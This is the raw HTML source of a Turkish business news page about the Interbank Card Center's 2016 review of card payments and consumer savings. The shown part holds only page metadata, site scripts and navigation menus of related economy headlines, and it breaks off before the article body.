﻿<!DOCTYPE html>
<html lang="tr">
  <head>
        <title>BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”</title>
    <meta charset="utf-8">
    <!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
    <meta name="description" content="Bankalararası Kart Merkezi (BKM) Türkiye&#039;de kartlı ödemeler ve nakitsiz toplum hedefine yönelik çalışmalar konusunda 2016 yılında yaşanan gelişmeleri">
    <meta name="keywords" content="Dr. Soner Canko, Soner Canko, Bankalararası Kart Merkezi, BKM">
    <meta property="fb:admins" content="">
        <meta property="og:site_name" content="BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”">
    <meta property="og:title" content="BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”">
    <meta property="og:description" content="Bankalararası Kart Merkezi (BKM) Türkiye&#039;de kartlı ödemeler ve nakitsiz toplum hedefine yönelik çalışmalar konusunda 2016 yılında yaşanan gelişmeleri"> 
    <meta property="og:url" content="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html">
    <meta property="og:image" content="http://www.kobi-efor.com.tr/images/haberler/bkm_acikladi_2016_da_tuketici_tasarrufa_yoneldi_luks_tuketimi_azaltti_h6095_559cb.png">    <meta property="og:type" content="article">
        <meta http-equiv="refresh" content="600">    <meta name="twitter:card" content="summary_large_image">        <meta name="twitter:url" content="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html">
    <meta name="twitter:domain" content="http://www.kobi-efor.com.tr/">
    <meta name="twitter:site" content="">
    <meta name="twitter:title" content="BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”">    <meta name="twitter:description" content="Bankalararası Kart Merkezi (BKM), Türkiye&#039;de kartlı ödemeler ve nakitsiz toplum hedefine yönelik çalışmalar konusunda 2016 yılında yaşanan gelişmeleri, yapılan basın toplantısında değerlendirdi.">
    <meta name="twitter:image:src" content="http://www.kobi-efor.com.tr/images/haberler/bkm_acikladi_2016_da_tuketici_tasarrufa_yoneldi_luks_tuketimi_azaltti_h6095_559cb.png">        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/base.min.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/icons.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/style.css" rel="stylesheet">
    <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/hs.css" rel="stylesheet">
   
        <link href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/style/print.css" rel="stylesheet" media="print, handheld">    <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.kobi-efor.com.tr/rss.php" />
    <link rel="shortcut icon" href="http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/favicon.ico">
    <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css">
    <link rel="canonical" href="http://www.kobi-efor.com.tr/reel-sektor/bkm-acikladi-2016-da-tuketici-tasarrufa-yoneldi-luks-tuketimi-azaltti-h6095.html">

     

    <!--[if gte IE 9]>
    <style type="text/css">
        .gradient {
            filter: none;
        }
    </style>
    <![endif]-->
    <!--[if IE 7]>
    <style type="text/css">
        .reklam.dikey.sol .fixed {
            margin-left:-px;
        }
    </style>
    <![endif]-->

    <script type="text/javascript">
    var site_url   = 'http://www.kobi-efor.com.tr/';
    var tema       = 'hs-vertigo';
    var theme_path = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/';
    var ajax_url   = '_ajax/';
    var cat_limit  = '10';
    var poll_voted = '';    var comment_approved = '0';
    var doviz    = '1';
    var lazyload = '1';
    var twitter_user  = '';
    var facebook_user = 'KobiEfor';
    var popup_saat = '1';
    var arkaplan_link = '';    var hava   = '1';
    var hava_default   = 'TUXX0014';
    var namaz   = '1';
    var namaz_default   = 'istanbul';
    var superlig   = '1';

        </script>

        <!-- GOOGLE ANALITIK -->
    <script type="text/javascript">
    	var _gaq = _gaq || [];
    	_gaq.push(['_setAccount', 'UA-26224214-1']);
    	_gaq.push(['_trackPageview']);
    </script>
    <!-- GOOGLE ANALITIK -->
    

    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body >



      <div class="container center shadow">
        <div class="header">
          <div id="ustkisim" class="row">
          ﻿<!-- UST REKLAM-MENU -->
        <div id="reklammenu" class="span12">
                    <div class="row-fluid">
            <div class="span12">
              <div class="ustmenu">
                <a href="http://www.kobi-efor.com.tr/m/" title="Mobil"><i class="halflings-icon phone"></i> Mobil</a>
                <a href="http://www.kobi-efor.com.tr/kunye.html" title="Künye"><i class="halflings-icon link"></i> Künye</a>
                <a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a>
                <a href="http://www.kobi-efor.com.tr/iletisim.html" title="İletişim" class="last"><i class="halflings-icon envelope"></i> İletişim</a>

                <div id="memberArea" class="pull-right"></div>
              
              </div>
            </div>
          </div>
        </div>
<!-- UST REKLAM-MENU ***************************************************** -->
<!-- LOGO REKLAM ALANI -->
        <div id="logo" class="span12">
          <div class="row-fluid">
            <div class="span3">
              <h1 class="logo"><a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_logo_190x87png.png" alt="BKM açıkladı: “2016&#039;da tüketici tasarrufa yöneldi, lüks tüketimi azalttı”" /></a></h1>
            </div>
            <div class="span6">
            <div class="row-fluid">
            <div class="reklam"><object type="application/x-shockwave-flash" data="http://www.kobi-efor.com.tr/images/banner/kobibannercalismasi.swf" width="468" height="60"><param name="movie" value="http://www.kobi-efor.com.tr/images/banner/kobibannercalismasi.swf" /></object></div>            </div>
            <div class="row-fluid line">
              <span><i class="halflings-icon time"></i> 07 Şubat 2017 Salı</span>
              <a href="http://facebook.com/KobiEfor" target="_blank" title="Facebook Sayfamız"><i class="social-icon social-fb"></i> Facebook</a>
              <a href="http://twitter.com/" target="_blank" title="Twitter Sayfamız"><i class="social-icon social-tw"></i> Twitter</a>
              <a href="" target="_blank" title="Google Plus Sayfamız"><i class="social-icon social-gl"></i> Google</a>
              <a href="http://www.kobi-efor.com.tr/rss.php" target="_blank" title="RSS Servisi"><i class="social-icon social-rss"></i> RSS</a>
            </div>
            </div>
                                    <div class="span1">
              <div id="doviz" class="currency">
               <!--h6>Piyasa</h6-->
                 <div id="ustdoviz" class="div">
                   <div class="imkb"><strong>BIST</strong><span class="sub"></span><span class="change"></span></div>
                   <div class="altin"><strong>ALTIN</strong><span class="sub"></span><span class="change"></span></div>
                   <div class="dolar"><strong>DOLAR</strong><span class="sub"></span><span class="change"></span></div>
                   <div class="euro"><strong>EURO</strong><span class="sub"></span><span class="change"></span></div>
                </div>
              </div>
            </div>
                                    <div class="span2">
              <div class="weather">
                    <select name="hava" class="row-fluid" onChange="hava_durumu(this.value);" >
                                          <option value="TUXX0061">Adana</option>
                                          <option value="9267066">Adıyaman</option>
                                          <option value="TUXX0046">Afyon</option>
                                          <option value="771">Ağrı</option>
                                          <option value="901">Aksaray</option>
                                          <option value="1412">Amasya</option>
                                          <option value="TUXX0002">Ankara</option>
                                          <option value="TUXX0004">Antalya</option>
                                          <option value="1885">Ardahan</option>
                                          <option value="9264197">Artvin</option>
                                          <option value="TUXX0051">Aydın</option>
                                          <option value="TUXX0041">Balıkesir</option>
                                          <option value="3037">Bartın</option>
                                          <option value="9261679">Batman</option>
                                          <option value="3200">Bayburt</option>
                                          <option value="3946">Bilecik</option>
                                          <option value="9260548">Bingöl</option>
                                          <option value="4045">Bitlis</option>
                                          <option value="TUXX0032">Bolu</option>
                                          <option value="5249">Burdur</option>
                                          <option value="TUXX0039">Bursa</option>
                                          <option value="TUXX0037">Çanakkale</option>
                                          <option value="9258078">Çankırı</option>
                                          <option value="TUXX0033">Çorum</option>
                                          <option value="8899">Denizli</option>
                                          <option value="TUXX0010">Diyarbakır</option>
                                          <option value="9252670">Düzce</option>
                                          <option value="TUXX0030">Edirne</option>
                                          <option value="TUXX0049">Elazığ</option>
                                          <option value="TUXX0035">Erzincan</option>
                                          <option value="TUXX0013">Erzurum</option>
                                          <option value="TUXX0040">Eskişehir</option>
                                          <option value="TUXX0055">Gaziantep</option>
                                          <option value="12125">Giresun</option>
                                          <option value="9248871">Gümüşhane</option>
                                          <option value="9255950">Hakkari</option>
                                          <option value="1694">Hatay</option>
                                          <option value="9245907">Iğdır</option>
                                          <option value="TUXX0052">Isparta</option>
                                          <option value="TUXX0014" selected>İstanbul</option>
                                          <option value="TUXX0015">İzmir</option>
                                          <option value="15888&">Kahramanmaraş</option>
                                          <option value="9243604">Karabük</option>
                                          <option value="16174">Karaman</option>
                                          <option value="16274">Kastamonu</option>
                                          <option value="16345">Kayseri</option>
                                          <option value="TUXX0019">Kırıkkale</option>
                                          <option value="16847">Kırklareli</option>
                                          <option value="TUXX0042">Kırşehir</option>
                                          <option value="16700">Kilis</option>
                                          <option value="TUXX0017">Kocaeli</option>
                                          <option value="TUXX0053">Konya</option>
                                          <option value="17542">Kütahya</option>
                                          <option value="19917">Malatya</option>
                                          <option value="20103">Manisa</option>
                                          <option value="20271">Mardin</option>
                                          <option value="14693">Mersin</option>
                                          <option value="TUXX0057">Muğla</option>
                                          <option value="TUXX0062">Muş</option>
                                          <option value="TUXX0065">Nevşehir</option>
                                          <option value="23341">Niğde</option>
                                          <option value="24553">Ordu</option>
                                          <option value="24703">Osmaniye</option>
                                          <option value="27911">Rize</option>
                                          <option value="TUXX0022">Sakarya</option>
                                          <option value="TUXX0023">Samsun</option>
                                          <option value="TUXX0050">Siirt</option>
                                          <option value="30965">Sinop</option>
                                          <option value="TUXX0034">Sivas</option>
                                          <option value="34552">Şanlıurfa</option>
                                          <option value="10034630">Şırnak</option>
                                          <option value="TUXX0031">Tekirdağ</option>
                                          <option value="33558">Tokat</option>
                                          <option value="TUXX0029">Trabzon</option>
                                          <option value="9226242">Tunceli</option>
                                          <option value="TUXX0045">Uşak</option>
                                          <option value="TUXX0043">Van</option>
                                          <option value="9250659">Yalova</option>
                                          <option value="37318">Yozgat</option>
                                          <option value="TUXX0028">Zonguldak</option>
                                          <option value="10208812">Kıbrıs</option>
                                          <option value="10700">Famagusta</option>
                                          <option value="23317">Girne</option>
                                          <option value="7261129">Güzelyurt</option>
                                          <option value="23317">Lefkoşa</option>
                                        </select>
                <div class="havadurumu"></div>
              </div>
            </div>
                                  </div>
        </div>
<!-- LOGO REKLAM ALANI ***************************************************** -->
<!-- MENU -->
        <div id="menu" class="span12">
          <div class="row-fluid">
              <div class="anamenu span12">
              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="9e0ea0bffd4b1111214e3a78a3a8661fa137667e" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
              <a href="http://www.kobi-efor.com.tr/" class="current darken">&nbsp;<i class="halflings-icon white home"></i>&nbsp;Ana Sayfa</a>
                <a href="http://www.kobi-efor.com.tr/hakkimizda-s4.html"> Hakkımızda</a>
                <a href="http://www.kobi-efor.com.tr/about-us-s5.html"> About Us</a>
                <a href="http://www.kobi-efor.com.tr/galeri/" class="blue"><i class="halflings-icon white picture"></i> Foto Galeri</a>
                <a href="http://www.kobi-efor.com.tr/webtv/" class="yellow"><i class="halflings-icon white film"></i> Web TV</a>
                <a href="http://www.kobi-efor.com.tr/edergi/oku/2017/2/" target="_blank"><i class="halflings-icon white book"></i> E-Dergi</a>
                <a href="http://www.kobi-efor.com.tr/edergi/" target="_blank"><i class="halflings-icon white folder-open"></i> Arşiv</a>
                <!--a href="http://www.kobi-efor.com.tr/biyografiler.html" class=""><i class="halflings-icon white book"></i> Biyografiler</a-->
                

            </div>
          </div>
            <div class="row-fluid sticky-menu">
                              <div class="kategori">
                <a href="http://www.kobi-efor.com.tr/" class="home">&nbsp;<i class="halflings-icon white home"></i>&nbsp;</a>                 
                                  <a title="KAPAK" href="http://www.kobi-efor.com.tr/kapak" id="k1"    >KAPAK</a>
<a title="ETKİNLİK" href="http://www.kobi-efor.com.tr/etkinlik" id="k38"    >ETKİNLİK</a>
<a title="SÖYLEŞİ" href="http://www.kobi-efor.com.tr/soylesi" id="k37"    >SÖYLEŞİ</a>
<a title="OSB" href="http://www.kobi-efor.com.tr/osb" id="k2"    >OSB</a>
<a title="SEKTÖR" href="http://www.kobi-efor.com.tr/sektor" id="k3"    >SEKTÖR</a>
<a title="ÜLKE" href="http://www.kobi-efor.com.tr/ulke" id="k5"    >ÜLKE</a>
<a title="AKADEMİ" href="http://www.kobi-efor.com.tr/akademi" id="k44"    >AKADEMİ</a>
<a title="DESTEK-TEŞVİK" href="http://www.kobi-efor.com.tr/destek-tesvik" id="k45"    >DESTEK-TEŞVİK</a>
<a title="YAŞAM" href="http://www.kobi-efor.com.tr/yasam" id="k47"    >YAŞAM</a>
<a title="HABERLER" href="http://www.kobi-efor.com.tr/haberler" id="k46"    >HABERLER</a>
<div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">Tüm Kategoriler</a></div> 
                                              <form action="http://www.kobi-efor.com.tr/" method="get" class="pull-right">
                  <input type="hidden" name="m" value="arama">
                  <input type="text" name="q" placeholder="Haber yada kelime ara...">
                  <input type="hidden" name="auth" value="9e0ea0bffd4b1111214e3a78a3a8661fa137667e" />
                  <button class="btn btn-link" type="submit"><i class="halflings-icon white search"></i></button>
              </form>
                </div>
                <div class="othercat">
                  <div class="inner">
                    <div class="clearfix">
                    
                    </div>
                  </div>
                </div>
                                          
           
          <div id="katicerik" class="row-fluid"><div class="katelement kat_k1">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/2017de-ekonomik-yukselise-yeni-bir-kaldirac-gumruk-birligi-reformu-h6006.html" title="2017de ekonomik yükselişe yeni bir ‘kaldıraç; GÜMRÜK BİRLİĞİ REFORMU"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/2017de_ekonomik_yukselise_yeni_bir_kaldirac_gumruk_birligi_reformu_h6006_e0389.png" alt="2017de ekonomik yükselişe yeni bir ‘kaldıraç; GÜMRÜK BİRLİĞİ REFORMU" />
<b>2017’de ekonomik yükselişe yeni bir ‘kaldıraç’; GÜMRÜK BİRLİĞİ REFORMU</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/2017-yili-ekonomik-buyume-stratejisi-uretime-yatirim-h5922.html" title="2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/2017_yili_ekonomik_buyume_stratejisi_uretime_yatirim_h5922_5c490.png" alt="2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM" />
<b>2017 Yılı Ekonomik Büyüme Stratejisi: ÜRETİME YATIRIM</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/yatirim-ve-istihdama-cozum-kobi-destekleri-h5842.html" title="Yatırım ve istihdama çözüm; KOBİ DESTEKLERİ"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yatirim_ve_istihdama_cozum_kobi_destekleri_h5842_e3b78.png" alt="Yatırım ve istihdama çözüm; KOBİ DESTEKLERİ" />
<b>Yatırım ve istihdama çözüm; KOBİ DESTEKLERİ</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/basbakan-binali-yildirim-yeni-orta-vadeli-programi-acikladi-isimiz-kis-bahtimiz-yaz-h5730.html" title="Başbakan Binali Yıldırım Yeni Orta Vadeli Programı açıkladı: ‘İŞİMİZ ‘KIŞ BAHTIMIZ ‘YAZ!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/basbakan_binali_yildirim_yeni_orta_vadeli_programi_acikladi_h5730_623e2.png" alt="Başbakan Binali Yıldırım Yeni Orta Vadeli Programı açıkladı: ‘İŞİMİZ ‘KIŞ BAHTIMIZ ‘YAZ!" />
<b>Başbakan Binali Yıldırım Yeni Orta Vadeli Programı açıkladı: ‘İŞ’İMİZ ‘KIŞ’ BAHTIMIZ ‘YAZ’!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/bilim-sanayi-ve-teknoloji-bakani-faruk-ozlu-h5635.html" title="Bilim, Sanayi ve Teknoloji Bakanı Faruk Özlü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uretim_reformu_h5635_8a82b.png" alt="Bilim, Sanayi ve Teknoloji Bakanı Faruk Özlü" />
<b>Bilim, Sanayi ve Teknoloji Bakanı Faruk Özlü</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/ekonomide-seferberlik-zamani-haydi-yatirim-ve-uretime-h5569.html" title="Ekonomide seferberlik zamanı: HAYDİ YATIRIM VE ÜRETİME"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomide_seferberlik_zamani_haydi_yatirim_ve_uretime_h5569_a8bd4.png" alt="Ekonomide seferberlik zamanı: HAYDİ YATIRIM VE ÜRETİME" />
<b>Ekonomide seferberlik zamanı: HAYDİ YATIRIM VE ÜRETİME</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/kapak/demokrasi-kazandi-h5512.html" title="Demokrasi kazandı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/demokrasi_kazandi_h5512_b7adb.png" alt="Demokrasi kazandı" />
<b>Demokrasi kazandı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/ingiltere-avrupa-birliginden-ayriliyor-brexit-h5513.html" title="İngiltere Avrupa Birliğinden ayrılıyor; BREXIT"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ingiltere_avrupa_birliginden_ayriliyor_brexit_h5513_6ecc4.png" alt="İngiltere Avrupa Birliğinden ayrılıyor; BREXIT" />
<b>İngiltere Avrupa Birliği’nden ayrılıyor; BREXIT</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/kapak/turkiyede-eksik-olan-bilgi-degil-pratik-ileri-teknolojiye-kobi-yolculugu-h5428.html" title="Türkiyede eksik olan bilgi değil, pratik. İLERİ TEKNOLOJİYE KOBİ YOLCULUĞU"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyede_eksik_olan_bilgi_degil_pratik_ileri_teknolojiye_kobi_yolculugu_h5428_6d601.png" alt="Türkiyede eksik olan bilgi değil, pratik. İLERİ TEKNOLOJİYE KOBİ YOLCULUĞU" />
<b>Türkiye’de eksik olan bilgi değil, pratik. İLERİ TEKNOLOJİYE KOBİ YOLCULUĞU</b></a>
</div>
</div></div><div class="katelement kat_k38">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/hatay-kobilerine-finansal-enformasyon-h5844.html" title="Hatay KOBİlerine finansal enformasyon"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hatay_kobi_lerine_finansal_enformasyon_h5844_7a0b2.png" alt="Hatay KOBİlerine finansal enformasyon" />
<b>Hatay KOBİ’lerine finansal enformasyon</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/finans-kulup-gencler-ve-kobilerle-bulusuyor-h5150.html" title="Finans Kulüp gençler ve KOBİlerle buluşuyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/finans_kulup_gencler_ve_kobilerle_bulusuyor_h5150_04101.png" alt="Finans Kulüp gençler ve KOBİlerle buluşuyor" />
<b>Finans Kulüp gençler ve KOBİ’lerle buluşuyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/turkiye-inovasyon-haftasi-3-gunde-50-bin-kisiyi-bulusturdu-h4840.html" title="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_inovasyon_haftasi_3_gunde_50_bin_kisiyi_bulusturdu_h4840_08d3d.png" alt="‘Türkiye İnovasyon Haftası 3 günde 50 bin kişiyi buluşturdu" />
<b>‘Türkiye İnovasyon Haftası’ 3 günde 50 bin kişiyi buluşturdu</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tbd-32-ulusal-bilisim-kurultayi-ve-2-ankara-bilisim-fuari-h4847.html" title="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbd_32_ulusal_bilisim_kurultayi_ve_2_ankara_bilisim_fuari_bilisim_2015citex_2015_h4847_125e6.png" alt="TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı" />
<b>TBD 32. Ulusal Bilişim Kurultayı ve 2. Ankara Bilişim Fuarı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/tosyov-samsunlu-kadin-girisimcileri-egitti-bilincli-kadin-girisimciler-artacak-h4844.html" title="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak."><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tosyov_samsunlu_kadin_girisimcileri_egitti_bilincli_kadin_girisimciler_artacak_h4844_b22e9.png" alt="TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak." />
<b>TOSYÖV, Samsunlu kadın girişimcileri eğitti: Bilinçli kadın girişimciler artacak.</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/4-kobi-ve-girisimcilik-odulleri-h4854.html" title="4. KOBİ ve Girişimcilik Ödülleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/4_kobi_ve_girisimcilik_odulleri_h4854_5b8a5.png" alt="4. KOBİ ve Girişimcilik Ödülleri" />
<b>4. KOBİ ve Girişimcilik Ödülleri</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/etkinlik/6-bogazici-zirvesi-80-ulkenin-siyasilerini-bulusturdu-daha-az-yoksulluk-daha-fazla-refah-h4856.html" title="6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. Daha az yoksulluk, daha fazla refah”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/6_bogazici_zirvesi_80_ulkenin_siyasilerini_bulusturdu_daha_az_yoksulluk_daha_fazla_refah_h4856_254da.png" alt="6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. Daha az yoksulluk, daha fazla refah”" />
<b>6. Boğaziçi Zirvesi, 80 ülkenin siyasilerini buluşturdu. “Daha az yoksulluk, daha fazla refah”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/toplam-95-milyar-dolar-ihracat-yaptilar-metal-sektorun-ihracat-yildizlari-odullerini-aldi-h4859.html" title="Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı."><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/toplam_95_milyar_dolar_ihracat_yaptilar_metal_sektorun_ihracat_yildizlari_odullerini_aldi_h4859_0cd96.png" alt="Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı." />
<b>Toplam 9.5 milyar dolar ihracat yaptılar. Metal sektörün ihracat yıldızları, ödüllerini aldı.</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/etkinlik/kalder-ve-tusiad-23-kez-kaliteyi-odullendirdi-mukemmelligi-surdurmek-h4694.html" title="KalDer ve TÜSİAD 23. kez kaliteyi ödüllendirdi: Mükemmelliği Sürdürmek”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kalder_ve_tusiad_23_kez_kaliteyi_odullendirdi_mukemmelligi_surdurmek_h4694_abd7d.png" alt="KalDer ve TÜSİAD 23. kez kaliteyi ödüllendirdi: Mükemmelliği Sürdürmek”" />
<b>KalDer ve TÜSİAD 23. kez kaliteyi ödüllendirdi: “Mükemmelliği Sürdürmek”</b></a>
</div>
</div></div><div class="katelement kat_k37">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/ayin-konugu/mugla-valisi-amir-cicekin-kent-ozetlemesiturizm-ve-yatirim-cenneti-h6008.html" title="Muğla Valisi Amir Çiçekin kent özetlemesi:Turizm ve yatırım cenneti"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mugla_valisi_amir_cicekin_kent_ozetlemesiturizm_ve_yatirim_cenneti_h6008_0f879.png" alt="Muğla Valisi Amir Çiçekin kent özetlemesi:Turizm ve yatırım cenneti" />
<b>Muğla Valisi Amir Çiçek’in kent özetlemesi:Turizm ve yatırım cenneti</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ekonomist/tusiad-basekonomisti-dr-zumrut-imamoglu-h6013.html" title="TÜSİAD Başekonomisti Dr. Zümrüt İmamoğlu:"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tusiad_basekonomisti_dr_zumrut_imamoglu_h6013_82b65.png" alt="TÜSİAD Başekonomisti Dr. Zümrüt İmamoğlu:" />
<b>TÜSİAD Başekonomisti Dr. Zümrüt İmamoğlu:</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ceo/kendi-deyimiyle-hirsli-tezcanli-hizli-ve-israrci-murat-akyuz-is-hayati-keyif-verirse-basariyi-getirir-h6014.html" title="Kendi deyimiyle hırslı, tezcanlı, hızlı ve ısrarcı” Murat Akyüz; İş hayatı keyif verirse başarıyı getirir”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kendi_deyimiyle_hirsli_tezcanli_hizli_ve_israrci_murat_akyuz_is_hayati_keyif_verirse_basariyi_getirir_h6014_b9666.png" alt="Kendi deyimiyle hırslı, tezcanlı, hızlı ve ısrarcı” Murat Akyüz; İş hayatı keyif verirse başarıyı getirir”" />
<b>Kendi deyimiyle “hırslı, tezcanlı, hızlı ve ısrarcı” Murat Akyüz; “İş hayatı keyif verirse başarıyı getirir”</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/finans/is-faktoring-talebi-gordu-yuzde-50-buyudu-h6015.html" title="İş Faktoring talebi gördü yüzde 50 büyüdü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/is_faktoring_talebi_gordu_yuzde_50_buyudu_h6015_faab4.png" alt="İş Faktoring talebi gördü yüzde 50 büyüdü" />
<b>İş Faktoring talebi gördü yüzde 50 büyüdü</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ayin-konugu/hatay-valisi-erdal-ata-ili-anlatti-ve-vurguladi-inanc-koridoruyuz-h5924.html" title="Hatay Valisi Erdal Ata, ili anlattı ve vurguladı: ‘İnanç koridoruyuz"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hatay_valisi_erdal_ata_ili_anlatti_ve_vurguladi_inanc_koridoruyuz_h5924_089ec.png" alt="Hatay Valisi Erdal Ata, ili anlattı ve vurguladı: ‘İnanç koridoruyuz" />
<b>Hatay Valisi Erdal Ata, ili anlattı ve vurguladı: ‘İnanç koridoru’yuz</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ceo/borusan-lojistik-genel-muduru-ibrahim-dolen-hizli-yenilikci-adil-ve-ozgur-bir-ruh-h5934.html" title="Borusan Lojistik Genel Müdürü İbrahim Dölen; Hızlı, yenilikçi, adil ve özgür bir ruh"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/borusan_lojistik_genel_muduru_ibrahim_dolen_hizli_yenilikci_adil_ve_ozgur_bir_ruh_h5934_33b38.png" alt="Borusan Lojistik Genel Müdürü İbrahim Dölen; Hızlı, yenilikçi, adil ve özgür bir ruh" />
<b>Borusan Lojistik Genel Müdürü İbrahim Dölen; Hızlı, yenilikçi, adil ve özgür bir ruh</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/finans/teb-faktoring-genel-muduru-cagatay-baydar-h5929.html" title="TEB Faktoring Genel Müdürü  Çağatay Baydar"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/teb_faktoring_genel_muduru_cagatay_baydar_h5929_b88d2.png" alt="TEB Faktoring Genel Müdürü  Çağatay Baydar" />
<b>TEB Faktoring Genel Müdürü  Çağatay Baydar</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ekonomist/profdr-a-suut-dogruel-sanayici-cikisi-saglar-h5936.html" title="Prof.Dr. A. Suut Doğruel: Sanayici çıkışı sağlar”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/profdr_a_suut_dogruel_sanayici_cikisi_saglar_h5936_68a66.png" alt="Prof.Dr. A. Suut Doğruel: Sanayici çıkışı sağlar”" />
<b>Prof.Dr. A. Suut Doğruel: “Sanayici çıkışı sağlar”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/ajans/musterilerinin-karsisinda-degil-daima-yanindadir-mottosuyla-hareket-eden-ajans-crm-medya-h5937.html" title="Müşterilerinin karşısında değil, daima yanındadır” mottosuyla hareket eden ajans; CRM Medya"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/musterilerinin_karsisinda_degil_daima_yanindadir_mottosuyla_hareket_eden_ajans_crm_medya_h5937_436d2.png" alt="Müşterilerinin karşısında değil, daima yanındadır” mottosuyla hareket eden ajans; CRM Medya" />
